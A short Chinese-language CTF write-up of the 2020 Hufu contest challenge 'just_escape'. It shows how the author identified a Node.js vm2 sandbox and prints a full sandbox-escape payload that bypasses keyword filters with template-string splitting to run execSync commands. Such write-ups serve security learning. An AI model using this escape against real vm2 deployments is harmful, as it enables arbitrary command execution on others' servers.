0%

2020 虎符网络安全大赛 just_escape

发表于 分类于
本文字数: 743 阅读时长 ≈ 1 分钟

进入这个页面

在这里插入图片描述

然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示

我们输入Error().stack

在这里插入图片描述

可以根据回显得到,这是一个JSvm2,而且经过测试许多关键字都被过滤


所以我们使用字符串拼接就可以了~~

然后我们去网上找一下关于vm2payload
在这里插入图片描述所以最终的payload为:

1
2
3
4
5
6
7
8
(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return proc`}ess`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_pro`}cess`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`ls /`).toString();
    }
})()

在这里插入图片描述)在这里插入图片描述
这儿不需要url编码,直接将上面payload复制进url栏就i可以了